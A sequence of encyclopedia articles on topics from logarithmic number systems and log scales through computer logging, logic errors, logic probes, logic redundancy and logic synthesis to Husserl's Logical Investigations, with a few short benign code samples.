In the late 1800s, the Spanish engineer Leonardo Torres Quevedo conceived a series of analogue calculating mechanical machines [ 12 ] [ 13 ] and developed one that could solve algebraic equations with eight terms, finding the roots, including the complex ones. One part of this machine called an "endless spindle" allowed the mechanical expression of the relation y = log ( 1 + 10 x ) {\displaystyle y=\log(1+10^{x})} , [ 14 ] with the aim of extracting the logarithm of a sum as a sum of logarithms.
A LNS has been used in the Gravity Pipe ( GRAPE-5 ) special-purpose supercomputer [ 15 ] that won the Gordon Bell Prize in 1999.
A substantial effort to explore the applicability of LNSs as a viable alternative to floating point for general-purpose processing of single-precision real numbers is described in the context of the European Logarithmic Microprocessor (ELM). [ 16 ] [ 17 ] A fabricated prototype of the processor, which has a 32-bit cotransformation-based LNS arithmetic logic unit (ALU), demonstrated LNSs as a "more accurate alternative to floating-point", with improved speed. Further improvement of the LNS design based on the ELM architecture has shown its capability to offer significantly higher speed and accuracy than floating-point as well. [ 18 ]
LNSs are sometimes used in FPGA -based applications where most arithmetic operations are multiplication or division. [ 19 ] | https://en.wikipedia.org/wiki/Logarithmic_number_system |
A logarithmic scale (or log scale ) is a method used to display numerical data that spans a broad range of values, especially when there are significant differences between the magnitudes of the numbers involved.
Unlike a linear scale where each unit of distance corresponds to the same increment, on a logarithmic scale each unit of length is a multiple of some base value raised to a power, and corresponds to the multiplication of the previous value in the scale by the base value. In common use, logarithmic scales are in base 10 (unless otherwise specified).
A logarithmic scale is nonlinear , and as such numbers with equal distance between them such as 1, 2, 3, 4, 5 are not equally spaced. Equally spaced values on a logarithmic scale have exponents that increment uniformly. Examples of equally spaced values are 10, 100, 1000, 10000, and 100000 (i.e., 10 1 , 10 2 , 10 3 , 10 4 , 10 5 ) and 2, 4, 8, 16, and 32 (i.e., 2 1 , 2 2 , 2 3 , 2 4 , 2 5 ).
Exponential growth curves are often depicted on a logarithmic scale graph .
The markings on slide rules are arranged in a log scale for multiplying or dividing numbers by adding or subtracting lengths on the scales.
The following are examples of commonly used logarithmic scales, where a larger quantity results in a higher value:
The following are examples of commonly used logarithmic scales, where a larger quantity results in a lower (or negative) value:
Some of our senses operate in a logarithmic fashion ( Weber–Fechner law ), which makes logarithmic scales for these input quantities especially appropriate. In particular, our sense of hearing perceives equal ratios of frequencies as equal differences in pitch. In addition, studies of young children in an isolated tribe have shown logarithmic scales to be the most natural display of numbers in some cultures. [ 1 ]
The top left graph is linear in the X- and Y-axes, and the Y-axis ranges from 0 to 10. A base-10 log scale is used for the Y-axis of the bottom left graph, and the Y-axis ranges from 0.1 to 1000.
The top right graph uses a log-10 scale for just the X-axis, and the bottom right graph uses a log-10 scale for both the X axis and the Y-axis.
Presentation of data on a logarithmic scale can be helpful when the data:
A slide rule has logarithmic scales, and nomograms often employ logarithmic scales. The geometric mean of two numbers is midway between the numbers. Before the advent of computer graphics, logarithmic graph paper was a commonly used scientific tool.
If both the vertical and horizontal axes of a plot are scaled logarithmically, the plot is referred to as a log–log plot .
If only the ordinate or abscissa is scaled logarithmically, the plot is referred to as a semi-logarithmic plot.
A modified log transform can be defined for negative input ( y < 0) to avoid the singularity for zero input ( y = 0), and so produce symmetric log plots: [ 2 ] [ 3 ]
Y = sgn ⁡ ( y ) ⋅ log 10 ⁡ ( 1 + | y / C | ) {\displaystyle Y=\operatorname {sgn}(y)\cdot \log _{10}(1+|y/C|)}
for a constant C =1/ln(10).
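Plotting libraries often expose this transform directly; for example, matplotlib offers a 'symlog' axis scale. A minimal sketch (the linthresh parameter name assumes a recent matplotlib version):

```python
import numpy as np
import matplotlib.pyplot as plt

y = np.linspace(-1000, 1000, 2001)
fig, ax = plt.subplots()
ax.plot(y, y)
# 'symlog' is linear inside [-linthresh, linthresh] and logarithmic beyond,
# so zero and negative values can be shown on one axis.
ax.set_yscale('symlog', linthresh=1)
plt.show()
```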
A logarithmic unit is a unit that can be used to express a quantity ( physical or mathematical) on a logarithmic scale, that is, as being proportional to the value of a logarithm function applied to the ratio of the quantity and a reference quantity of the same type. The choice of unit generally indicates the type of quantity and the base of the logarithm.
Examples of logarithmic units include units of information and information entropy ( nat , shannon , ban ) and of signal level ( decibel , bel, neper ). Frequency levels or logarithmic frequency quantities are expressed in various units used in electronics ( decade , octave ) and for music pitch intervals ( octave , semitone , cent , etc.). Other logarithmic scale units include the Richter magnitude scale point.
In addition, several industrial measures are logarithmic, such as standard values for resistors , the American wire gauge , the Birmingham gauge used for wire and needles, and so on.
The two definitions of a decibel are equivalent, because a ratio of power quantities is equal to the square of the corresponding ratio of root-power quantities . [ citation needed ] [ 4 ] | https://en.wikipedia.org/wiki/Logarithmic_scale |
Logeion is an open-access database of Latin and Ancient Greek dictionaries. [ 1 ] Developed by Josh Goldenberg and Matt Shanahan in 2011, it is hosted by the University of Chicago . Apart from simultaneous search capabilities across different dictionaries and reference works, Logeion offers access to frequency and collocation data from the Perseus Project .
Having started out as an aggregator for Latin and Ancient Greek dictionaries, Logeion has implemented multiple new features in its development. These include:
Furthermore, an iOS app was developed by Joshua Day in 2013. The app's second version, launched in 2018, is also available for Android devices.
As of November 2018, Logeion contains the following dictionaries. [ 2 ]
This database -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logeion |
In computing , logging is the act of keeping a log of events that occur in a computer system, such as problems, errors or just information on current operations. These events may occur in the operating system or in other software . A message or log entry is recorded for each such event. These log messages can then be used to monitor and understand the operation of the system, to debug problems, or during an audit . Logging is particularly important in multi-user software , to have a central overview of the operation of the system.
In the simplest case, messages are written to a file, called a log file . [ 1 ] Alternatively, the messages may be written to a dedicated logging system or to a log management software, where it is stored in a database or on a different computer system.
Specifically, a transaction log is a log of the communications between a system and the users of that system, [ 2 ] or a data collection method that automatically captures the type, content, or time of transactions made by a person from a terminal with that system. [ 3 ] For Web searching, a transaction log is an electronic record of interactions that have occurred during a searching episode between a Web search engine and users searching for information on that Web search engine.
Many operating systems, software frameworks and programs include a logging system. A widely used logging standard is Syslog , defined in IETF RFC 5424. [ 4 ] The Syslog standard enables a dedicated, standardized subsystem to generate, filter, record, and analyze log messages. This relieves software developers of having to design and code their ad hoc logging systems. [ 5 ] [ 6 ] [ 7 ]
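As a concrete illustration, Python's standard logging module can hand records to a Syslog daemon rather than an ad hoc file. In this sketch the logger name "myapp" is arbitrary, and the /dev/log socket path assumes a typical Linux system:

```python
import logging
import logging.handlers

logger = logging.getLogger("myapp")
logger.setLevel(logging.INFO)

# Route records to the local Syslog daemon instead of an ad hoc file.
handler = logging.handlers.SysLogHandler(address="/dev/log")
handler.setFormatter(logging.Formatter("myapp: %(levelname)s %(message)s"))
logger.addHandler(handler)

logger.info("service started")
logger.error("could not open configuration file")
```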
Event logs record events taking place in the execution of a system that can be used to understand the activity of the system and to diagnose problems.
They are essential for understanding the activity of a system, particularly in the case of applications with little user interaction.
It can also be useful to combine log file entries from multiple sources; correlating related events recorded on different servers can yield insights that no single log provides. Other solutions employ network-wide querying and reporting . [ 8 ] [ 9 ]
Most database systems maintain some kind of transaction log , which is not mainly intended as an audit trail for later analysis and is not intended to be human-readable . These logs record changes to the stored data to allow the database to recover from crashes or other data errors and maintain the stored data in a consistent state. Thus, database systems usually have both general event logs and transaction logs. [ 10 ] [ 11 ] [ 12 ] [ 13 ]
The use of data stored in transaction logs of Web search engines, Intranets, and Web sites can provide valuable insight into understanding the information-searching process of online searchers. [ 14 ] This understanding can enlighten information system design, interface development, and devising the information architecture for content collections.
Internet Relay Chat (IRC) , instant messaging (IM) programs, peer-to-peer file sharing clients with chat functions, and multiplayer games (especially MMORPGs ) commonly have the ability to automatically save textual communication, both public (IRC channel/IM conference/MMO public/party chat messages) and private chat between users, as message logs. [ 15 ] Message logs are almost universally plain text files, but IM and VoIP clients (which support textual chat, e.g. Skype) might save them in HTML files or in a custom format to ease reading or enable encryption .
In the case of IRC software, message logs often include system/server messages and entries related to channel and user changes (e.g. topic change, user joins/exits/ kicks / bans , nickname changes, the user status changes), making them more like a combined message/event log of the channel in question, but such a log is not comparable to a true IRC server event log, because it only records user-visible events for the time frame the user spent being connected to a certain channel.
Instant messaging and VoIP clients often offer the chance to store encrypted logs to enhance the user's privacy. These logs require a password to be decrypted and viewed, and they are often handled by their respective writing application. Some privacy focused messaging services, such as Signal , record minimal logs about users, limiting their information to connection times. [ 16 ]
A server log is a log file (or several files) automatically created and maintained by a server consisting of a list of activities it performed.
A typical example is a web server log which maintains a history of page requests. The W3C maintains a standard format (the Common Log Format ) for web server log files, but other proprietary formats exist. [ 9 ] Some servers can log information to computer readable formats (such as JSON ) versus the human readable standard. [ 17 ] More recent entries are typically appended to the end of the file. Information about the request, including client IP address , request date / time , page requested, HTTP code, bytes served, user agent , and referrer are typically added. This data can be combined into a single file, or separated into distinct logs, such as an access log, error log, or referrer log. However, server logs typically do not collect user-specific information.
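A sketch of parsing one Common Log Format entry with a regular expression; the sample line is the format's canonical example:

```python
import re

# Common Log Format: host ident authuser [date] "request" status bytes
CLF = re.compile(
    r'(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<date>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

line = '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326'
m = CLF.match(line)
if m:
    print(m.group("host"), m.group("status"), m.group("size"))
```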
These files are usually not accessible to general Internet users, only to the webmaster or other administrative person of an Internet service. A statistical analysis of the server log may be used to examine traffic patterns by time of day, day of week, referrer, or user agent. Efficient web site administration, adequate hosting resources and the fine tuning of sales efforts can be aided by analysis of the web server logs. | https://en.wikipedia.org/wiki/Logging_(computing) |
Logging as a service (LaaS) is an IT architectural model for centrally ingesting and collecting any type of log files coming from any given source or location such as servers , applications , devices etc. The files are "normalized" or filtered for reformatting and forwarding to other dependent systems to be processed as “native” data, which can then be managed, displayed and ultimately disposed of according to a predesignated retention schedule based on any number of criteria.
In an enterprise situation, the IT datacenter becomes the hub for all log files and normalization. In a managed service provider (MSP) environment, the log sources would be coming from applications outside the enterprise but still hosted and managed by the MSP as needed.
Under this model, the IT datacenter acts as the " private cloud " under the concept of cloud computing to provision the logs to various stakeholders within the organization for future forensics [ 1 ] or analysis to identify risks, patterns of activity or predict behaviors based on the data collected within the logs. Just as IT becomes the "hub" of the service, the stakeholders become the beneficiaries of the centralized data in the form of alerts, reports or any periphery applications for predictive analysis or insight from big data through graphical display.
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logging_as_a_service |
Logic Trunked Radio ( LTR ) is a radio system developed in the late 1970s by the E. F. Johnson Company . [ 1 ]
LTR is distinguished from some other common trunked radio systems in that it does not have a dedicated control channel . LTR systems are limited to 20 channels (repeaters) per site and each site stands alone (not linked). Each repeater has its own controller and all of these controllers are coordinated together. Even though each controller monitors its own channel, one of the channel controllers is assigned to be a master and all the other controllers report to it.
Typically on LTR systems, each of these controllers periodically sends out a data burst (approximately every 10 seconds on LTR Standard systems) so that the subscriber units know that the system is there and which channels are in use or available. The idle data burst can be turned off if desired by the system operator. Some systems will broadcast idle data bursts only on channels used as home channels and not on those used for "overflow" conversations. To a listener, the idle data burst will sound like a short blip of static like someone keyed up and unkeyed a radio within about 1/4 second. This data burst is not sent at the same time by all the channels but happen randomly throughout all the system channels. | https://en.wikipedia.org/wiki/Logic_Trunked_Radio |
Formal scientists have attempted to combine formal logic (the science of deductively valid inferences or of logical truths ) and dialectic (a form of reasoning based upon dialogue of arguments and counter-arguments) through formalisation of dialectic. These attempts include pre-formal and partially formal treatises on argument and dialectic , systems based on defeasible reasoning , and systems based on game semantics and dialogical logic .
Since the late 20th century, European and American logicians have attempted to provide mathematical foundations for dialectic through formalisation, [ 1 ] : 201–372 although logic has been related to dialectic since ancient times. [ 1 ] : 51–140 There have been pre-formal and partially-formal treatises on argument and dialectic, from authors such as Stephen Toulmin ( The Uses of Argument , 1958), [ 2 ] [ 3 ] [ 1 ] : 203–256 Nicholas Rescher ( Dialectics: A Controversy-Oriented Approach to the Theory of Knowledge , 1977), [ 4 ] [ 5 ] [ 1 ] : 330–336 and Frans H. van Eemeren and Rob Grootendorst ( pragma-dialectics , 1980s). [ 1 ] : 517–614 One can include works of the communities of informal logic and paraconsistent logic . [ 1 ] : 373–424
Building on theories of defeasible reasoning (see John L. Pollock ), systems have been built that define well-formedness of arguments, rules governing the process of introducing arguments based on fixed assumptions, and rules for shifting burden. [ 1 ] : 615–675 Many of these logics appear in the special area of artificial intelligence and law , though the computer scientists' interest in formalizing dialectic originates in a desire to build decision support and computer-supported collaborative work systems. [ 6 ]
Dialectic itself can be formalised as moves in a game, where an advocate for the truth of a proposition and an opponent argue. [ 1 ] : 301–372 Such games can provide a semantics of logic , one that is very general in applicability. [ 1 ] : 314
This philosophy -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logic_and_dialectic |
As the study of argument is of clear importance to the reasons that we hold things to be true, logic is of essential importance to rationality . Arguments may be logical if they are "conducted or assessed according to strict principles of validity ", [ 1 ] while they are rational according to the broader requirement that they are based on reason and knowledge .
Logic and rationality have each been taken as fundamental concepts in philosophy . They are not the same thing. Philosophical rationalism in its most extreme form is the doctrine that knowledge can ultimately be founded on pure reason, while logicism is the doctrine that mathematical concepts, among others, are reducible to pure logic.
Deductive reasoning concerns the logical consequence of given premises. On a narrow conception of logic, logic concerns just deductive reasoning, although such a narrow conception controversially excludes most of what is called informal logic from the discipline. Other forms of reasoning are sometimes also taken to be part of logic, such as inductive reasoning and abductive reasoning , which are forms of reasoning that are not purely deductive, but include material inference . Similarly, it is important to distinguish deductive validity and inductive validity (called "strength"). An inference is deductively valid if and only if there is no possible situation in which all the premises are true but the conclusion false. An inference is inductively strong if and only if its premises give some degree of probability to its conclusion.
The notion of deductive validity can be rigorously stated for systems of formal logic in terms of the well-understood notions of semantics . Inductive validity, on the other hand, requires us to define a reliable generalization of some set of observations. The task of providing this definition may be approached in various ways, some less formal than others; some of these definitions may use logical association rule induction , while others may use mathematical models of probability such as decision trees . For the most part this discussion of logic deals only with deductive logic.
Abductive reasoning is a form of inference which goes from an observation to a theory which accounts for the observation, ideally seeking to find the simplest and most likely explanation. In abductive reasoning, unlike in deductive reasoning, the premises do not guarantee the conclusion. One can understand abductive reasoning as "inference to the best explanation". [ 2 ]
Critical thinking, also called critical analysis, is clear, rational thinking involving critique .
Dialectic is a discourse between two or more people holding different points of view about a subject but wishing to establish the truth through reasoned arguments. It has been the object of study since ancient times, but only recently has it been the subject of attempts at formalisation.
Illogicality in terms of thinking processes are, as defined by researchers such as Aaron T. Beck , cognitive distortions that cause abnormal functioning. The state of depression often feeds off of illogical thinking and results in victims being mired in self-defeating conclusions. Patients seeking psychological help may suffer from problems of over-generalization , becoming mired in general, negative conclusions on the basis of essentially insignificant life events. Cognitive behavioral therapy can assist individuals in recognizing their own habits of faulty logic and slanted interpretations of past experiences. [ 3 ]
On the other hand, depression in the sense of "Weltschmerz" , in its non-aesthetically realistic and non-positivistic nature, is intrinsically logical and rational. Some philosophers assert that the question of the value of life has not been answered in a psychologically pleasing way without embracing the circular reasoning fallacy. [ 4 ] [ 5 ]
In the socio-political context, the ability to amalgamate disparate, conflicting interests and passions into an illogical synthesis has been labeled as a possible strength, albeit one with concurrent weaknesses, by literary publications such as Blackwood's Magazine :
It is difficult not to connect together these two very characteristic ideas of illogicalness and permanence. Not that illogicalness is itself a virtue, but the illogicalness of which we speak is not simply bad reasoning. It means here only that more than one principle is found to assert itself in... social work. But these principles are fused into a higher unity. The illogicalness is not the cause of the permanence, but rather both are joint products of a common cause—respect, namely, for the living forces which exist in human nature. [ 6 ] | https://en.wikipedia.org/wiki/Logic_and_rationality |
In computer programming , a logic error is a bug in a program that causes it to operate incorrectly, but not to terminate abnormally (or crash ). [ 1 ] A logic error produces unintended or undesired output or other behaviour, although it may not immediately be recognized as such.
Logic errors occur in both compiled and interpreted languages. Unlike a program with a syntax error , a program with a logic error is a valid program in the language, though it does not behave as intended. Often the only clue to the existence of logic errors is the production of wrong solutions, though static analysis may sometimes spot them.
One of the ways to find this type of error is to print out the program's variables to a file or on the screen in order to determine the error's location in code. Although this will not work in all cases, for example when calling the wrong subroutine , it is the easiest way to find the problem if the program uses the incorrect results of a bad mathematical calculation .
This example function in C to calculate the average of two numbers contains a logic error. It is missing parentheses in the calculation, so it compiles and runs but does not give the expected answer due to operator precedence (division is evaluated before addition).
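The function itself is not reproduced above; a minimal reconstruction consistent with the description might look like this (identifier names are assumptions):

```c
#include <stdio.h>

/* Intended to return the mean of a and b, but the missing parentheses
   mean b / 2 is evaluated first, so the result is a + (b / 2). */
int average(int a, int b)
{
    return a + b / 2;   /* correct version: return (a + b) / 2; */
}

int main(void)
{
    printf("%d\n", average(2, 2));  /* prints 3, not the expected 2 */
    return 0;
}
```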
This computer-programming -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logic_error |
The logic of information , or the logical theory of information , considers the information content of logical signs and expressions along the lines initially developed by Charles Sanders Peirce . In this line of work, the concept of information serves to integrate the aspects of signs and expressions that are separately covered, on the one hand, by the concepts of denotation and extension , and on the other hand, by the concepts of connotation and comprehension .
Peirce began to develop these ideas in his lectures "On the Logic of Science" at Harvard University (1865) and the Lowell Institute (1866).
This semiotics article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logic_of_information |
A logic probe is a low-cost hand-held test probe used for analyzing and troubleshooting the logical states ( boolean 0 or 1) of a digital circuit. When many signals need to be observed or recorded simultaneously, a logic analyzer is used instead.
While most logic probes are powered by the circuit under test, some devices use batteries. They can be used on either TTL (transistor-transistor logic) or CMOS (complementary metal-oxide semiconductor) logic integrated circuit devices, such as 7400-series , 4000 series , and newer logic families that support similar voltages.
Most modern logic probes typically have one or more LEDs on the body of the probe:
A control on the logic probe allows either the capture and storage of a single event or continuous running.
When the logic probe is either connected to an invalid logic level (a fault condition or a tri-stated output) or not connected at all, none of the LEDs light up.
Another control on the logic probe allows selection of either TTL or CMOS family logic. This is required as these families have different thresholds for the logic-high (V IH ) and logic-low (V IL ) circuit voltages .
Some logic probes have an audible tone, the behavior of which varies across models. A model may either 1) emit a tone for a high logic state and no tone otherwise, or 2) emit a higher-frequency tone for a high logic state, a lower-frequency tone for a low logic state, and no tone for no connection or tri-state. An oscillating signal causes the probe to alternate between high-state and low-state tones.
The logic probe was invented by Gary Gordon in 1968 while he was employed by Hewlett-Packard . [ 2 ] [ 3 ] | https://en.wikipedia.org/wiki/Logic_probe |
Logic redundancy occurs in a digital gate network containing circuitry that does not affect the static logic function. There are several reasons why logic redundancy may exist. One reason is that it may have been added deliberately to suppress transient glitches in the output signals (which would otherwise arise from a race condition ) by having two or more product terms overlap with a third one.
Consider the following equation:

$Y = AB + {\overline {A}}C + BC$
The third product term $BC$ is a redundant consensus term . If $A$ switches from 1 to 0 while $B = 1$ and $C = 1$ , $Y$ remains 1. During the transition of signal $A$ in logic gates, both the first and second term may be 0 momentarily. The third term prevents a glitch since its value of 1 in this case is not affected by the transition of signal $A$ .
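The static redundancy of the consensus term is easy to confirm by brute force. The sketch below, assuming the expression $Y = AB + {\overline {A}}C + BC$ given above, checks that dropping the term never changes the static output:

```c
#include <stdio.h>

/* Exhaustively verify that Y = AB + !A*C + BC equals AB + !A*C for every
 * static input combination: the consensus term BC is logically redundant.
 * (It matters only dynamically, suppressing the glitch while A switches.) */
int main(void)
{
    for (int a = 0; a <= 1; a++)
        for (int b = 0; b <= 1; b++)
            for (int c = 0; c <= 1; c++) {
                int without_bc = (a & b) | (!a & c);
                int with_bc    = (a & b) | (!a & c) | (b & c);
                if (with_bc != without_bc)
                    printf("differs at A=%d B=%d C=%d\n", a, b, c);
            }
    printf("all 8 input combinations agree\n");
    return 0;
}
```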
Another reason for logic redundancy is poor design practice that unintentionally results in logically redundant terms. This causes an unnecessary increase in network complexity and can hamper the ability to test manufactured designs using traditional test methods (single stuck-at fault models). In such cases, testing might still be possible using IDDQ models.
Logic redundancy is, in general, not desired.
Redundancy, by definition, requires extra parts (in this case: logical terms) which raises the cost of implementation (either actual cost of physical parts or CPU time to process).
Logic redundancy can be removed by several well-known techniques, such as Karnaugh maps , the Quine–McCluskey algorithm , and the heuristic computer method .
In some cases it may be desirable to add logic redundancy. One of those cases is to avoid race conditions, whereby an output can fluctuate because different terms are "racing" to turn off and on. To explain this in more concrete terms, the Karnaugh map to the right shows the minterms for the following function:
The boxes represent the minimal AND/OR terms needed to implement this function:
The k-map visually shows where race conditions occur in the minimal expression by having gaps between minterms, for example, the gap between the blue and green rectangles. If the input were to change from $1110$ [ 1 ] to $1010$ , then a race will occur between $BC{\overline {D}}$ turning off and $A{\overline {B}}$ turning on.
If the blue term switches off before the green turns on then the output will fluctuate and may register as 0.
Another race condition is between the blue and the red for the transition from $1110$ to $1100$ .
The race condition is removed by adding in logic redundancy.
Both minterm race conditions are covered by the addition of the yellow term $A{\overline {D}}$ .
In this case, the addition of logic redundancy has stabilized the output, avoiding fluctuations that occur when terms race each other to change state.
In computer engineering , logic synthesis is a process by which an abstract specification of desired circuit behavior, typically at register transfer level (RTL), is turned into a design implementation in terms of logic gates , typically by a computer program called a synthesis tool . Common examples of this process include synthesis of designs specified in hardware description languages , including VHDL and Verilog . [ 1 ] Some synthesis tools generate bitstreams for programmable logic devices such as PALs or FPGAs , while others target the creation of ASICs . Logic synthesis is one step in the electronic design automation flow for circuit design ; the others are place and route and verification and validation .
The roots of logic synthesis can be traced to the treatment of logic by George Boole (1815 to 1864), in what is now termed Boolean algebra . In 1938, Claude Shannon showed that the two-valued Boolean algebra can describe the operation of switching circuits. In the early days, logic design involved manipulating the truth table representations as Karnaugh maps . The Karnaugh map-based minimization of logic is guided by a set of rules on how entries in the maps can be combined. A human designer can typically only work with Karnaugh maps containing up to four to six variables.
The first step toward automation of logic minimization was the introduction of the Quine–McCluskey algorithm that could be implemented on a computer. This exact minimization technique presented the notion of prime implicants and minimum cost covers that would become the cornerstone of two-level minimization . Nowadays, the much more efficient Espresso heuristic logic minimizer has become the standard tool for this operation. [ needs update ] Another area of early research was in state minimization and encoding of finite-state machines (FSMs), a task that was the bane of designers. The applications for logic synthesis lay primarily in digital computer design. Hence, IBM and Bell Labs played a pivotal role in the early automation of logic synthesis. The evolution from discrete logic components to programmable logic arrays (PLAs) hastened the need for efficient two-level minimization, since minimizing terms in a two-level representation reduces the area in a PLA.
Two-level logic circuits are of limited importance in very-large-scale integration (VLSI) design; most designs use multiple levels of logic. Almost any circuit representation in RTL or behavioural description is a multi-level representation. An early system that was used to design multilevel circuits was LSS from IBM. It used local transformations to simplify logic. Work on LSS and the Yorktown Silicon Compiler spurred rapid research progress in logic synthesis in the 1980s. Several universities contributed by making their research available to the public, most notably SIS from University of California, Berkeley , RASP from University of California, Los Angeles and BOLD from University of Colorado, Boulder . Within a decade, the technology migrated to commercial logic synthesis products offered by electronic design automation companies.
The leading developers and providers of logic synthesis software packages are Synopsys , Cadence , and Siemens . Their synthesis tools are Synopsys Design Compiler, Cadence First Encounter and Siemens Precision RTL.
Logic design is a step in the standard design cycle in which the functional design of an electronic circuit is converted into a representation that captures logic operations , arithmetic operations , control flow , etc. A common output of this step is an RTL description . Logic design is commonly followed by the circuit design step. In modern electronic design automation , parts of the logical design may be automated using high-level synthesis tools based on the behavioral description of the circuit. [ 2 ]
Logic operations usually consist of Boolean AND, OR, XOR and NAND operations, and are the most basic forms of operations in an electronic circuit. Arithmetic operations are usually implemented with the use of logic operators.
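As a small illustration of the second point, a 1-bit full adder can be expressed entirely with Boolean operators. This is a generic textbook construction, not tied to any particular synthesis tool:

```c
#include <stdio.h>

/* A 1-bit full adder built only from logic operations (XOR, AND, OR),
 * showing how an arithmetic operation reduces to logic operators. */
static void full_adder(int a, int b, int cin, int *sum, int *cout)
{
    *sum  = a ^ b ^ cin;               /* sum bit                    */
    *cout = (a & b) | (cin & (a ^ b)); /* carry-out (majority logic) */
}

int main(void)
{
    int sum, cout;
    full_adder(1, 1, 0, &sum, &cout);
    printf("1 + 1 + 0 -> sum=%d, carry=%d\n", sum, cout); /* sum=0, carry=1 */
    return 0;
}
```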
With a goal of increasing designer productivity, research efforts on the synthesis of circuits specified at the behavioral level have led to the emergence of commercial solutions in 2004, [ 3 ] which are used for complex ASIC and FPGA design. These tools automatically synthesize circuits specified using high-level languages, like ANSI C/C++ or SystemC, to a register transfer level (RTL) specification, which can be used as input to a gate-level logic synthesis flow. [ 3 ] Using high-level synthesis, also known as ESL synthesis, the allocation of work to clock cycles and across structural components, such as floating-point ALUs, is done by the compiler using an optimisation procedure, whereas with RTL logic synthesis (even from behavioural Verilog or VHDL, where a thread of execution can make multiple reads and writes to a variable within a clock cycle) those allocation decisions have already been made.
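The kind of source code such tools accept looks like ordinary C. The fragment below is a hypothetical example of high-level synthesis input; real flows typically add tool-specific pragmas to control pipelining and unrolling:

```c
#include <stdio.h>

/* A fixed-bound loop like this is typical high-level synthesis input.
 * An HLS compiler decides how many multipliers and adders to allocate
 * and how to schedule the loop iterations across clock cycles. */
int dot_product(const int a[8], const int b[8])
{
    int acc = 0;
    for (int i = 0; i < 8; i++)
        acc += a[i] * b[i];
    return acc;
}

int main(void)
{
    int a[8] = {1, 2, 3, 4, 5, 6, 7, 8};
    int b[8] = {1, 1, 1, 1, 1, 1, 1, 1};
    printf("%d\n", dot_product(a, b)); /* 36 */
    return 0;
}
```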
Typical practical implementations of a logic function utilize a multi-level network of logic elements. Starting from an RTL description of a design, the synthesis tool constructs a corresponding multilevel Boolean network .
Next, this network is optimized using several technology-independent techniques before technology-dependent optimizations are performed. The typical cost function during technology-independent optimizations is total literal count of the factored representation of the logic function (which correlates quite well with circuit area).
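To make the literal-count cost concrete: the sum-of-products form $F = ab + ac$ has four literals, while the equivalent factored form $F = a(b + c)$ has three. The sketch below is an illustrative check of that equivalence, not part of any synthesis tool:

```c
#include <stdio.h>

/* The factored form a(b + c) implements the same function as ab + ac
 * with one fewer literal, which typically translates into less area. */
int main(void)
{
    for (int a = 0; a <= 1; a++)
        for (int b = 0; b <= 1; b++)
            for (int c = 0; c <= 1; c++) {
                int sop      = (a & b) | (a & c); /* 4 literals */
                int factored = a & (b | c);       /* 3 literals */
                if (sop != factored)
                    printf("mismatch at a=%d b=%d c=%d\n", a, b, c);
            }
    printf("equivalent on all inputs; factoring saved one literal\n");
    return 0;
}
```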
Finally, technology-dependent optimization transforms the technology-independent circuit into a network of gates in a given technology. The simple cost estimates are replaced by more concrete, implementation-driven estimates during and after technology mapping. Mapping is constrained by factors such as the available gates (logic functions) in the technology library, the drive sizes for each gate, and the delay, power , and area characteristics of each gate. | https://en.wikipedia.org/wiki/Logic_synthesis |
The Logical Investigations ( German : Logische Untersuchungen ; 1900–1901, second edition 1913) is a two-volume work by the philosopher Edmund Husserl , in which the author discusses the philosophy of logic and criticizes psychologism , the view that logic is based on psychology .
The work has been praised by philosophers for helping to discredit psychologism, Husserl's opposition to which has been attributed to the philosopher Gottlob Frege 's criticism of his Philosophy of Arithmetic (1891). The Logical Investigations influenced philosophers such as Martin Heidegger and Emil Lask , and contributed to the development of phenomenology , continental philosophy , and structuralism . The Logical Investigations has been compared to the work of the philosophers Immanuel Kant and Wilhelm Dilthey , the latter of whom praised the work. However, the work has been criticized for its obscurity, and some commentators have maintained that Husserl inconsistently advanced a form of psychologism, despite Husserl's critique of psychologism. When Husserl later published Ideas (1913), he lost support from some followers who believed the work adopted a different philosophical position from that which Husserl had endorsed in the Logical Investigations . Husserl acknowledged in his manuscripts that the work suffered from shortcomings.
The Logical Investigations comprise two volumes. In the German editions, these are Volume I, "Prolegomena to Pure Logic" ( Prolegomena zur reinen Logik ), and Volume II, "Investigations in Phenomenology and Knowledge" ( Untersuchungen zur Phänomenologie und Theorie der Erkenntnis ). [ 1 ] [ 2 ]
In Volume I, Husserl writes that the Logical Investigations arose out of problems he encountered in attempting to achieve a "philosophical clarification of pure mathematics", which revealed to him shortcomings of logic as understood in his time. Husserl's "logical researches into formal arithmetic and the theory of manifolds " moved him beyond the study of mathematics and towards "a universal theory of formal deductive systems." He acknowledges that he had previously seen psychology as providing logic with "philosophical clarification", and explains his subsequent abandonment of that assumption. [ 3 ] According to Husserl, logic "seeks to search into what pertains to genuine, valid science as such, what constitutes the Idea of Science, so as to be able to use the latter to measure the empirically given sciences as to their agreement with their Idea, the degree to which they approach it, and where they offend against it." He criticizes empiricism , and critiques psychologism, a position on the nature of logic according to which the "essential theoretical foundations of logic lie in psychology"; Husserl criticizes the philosopher John Stuart Mill , taking his views on logic as an example of psychologism. He also discusses the views of the philosopher Immanuel Kant, as put forward in the Critique of Pure Reason (1781), as well as those of other philosophers, including Franz Brentano , Alexius Meinong , and Wilhelm Wundt . [ 4 ]
In Volume II, Husserl discusses the relevance of linguistic analysis to logic and continues his criticism of Mill. [ 5 ]
The Logical Investigations was first published in two volumes in 1900 and 1901 by M. Niemeyer. Volume I of the second edition was first published in 1913, and Volume II of the second edition in 1921. In 1970, Routledge & Kegan Paul Ltd published an English translation by the philosopher John Niemeyer Findlay . In 2001, a new edition of Findlay's translation with a preface by the philosopher Michael Dummett and an introduction by the philosopher Dermot Moran was published by Routledge. [ 6 ] [ 7 ] [ 8 ] [ 9 ]
Husserl commented in Ideas that the Logical Investigations had led to phenomenology being mistakenly viewed as a branch of empirical psychology, despite his protests, in the article "Philosophy as Strict Science", that this was a misunderstanding of his work. [ 10 ] Husserl's assessment of the Logical Investigations has been discussed in the Journal of Speculative Philosophy by Ullrich Melle; [ 11 ] the journal also published Husserl's manuscript “On the Task and Historical Position of the Logical Investigations ”. [ 12 ]
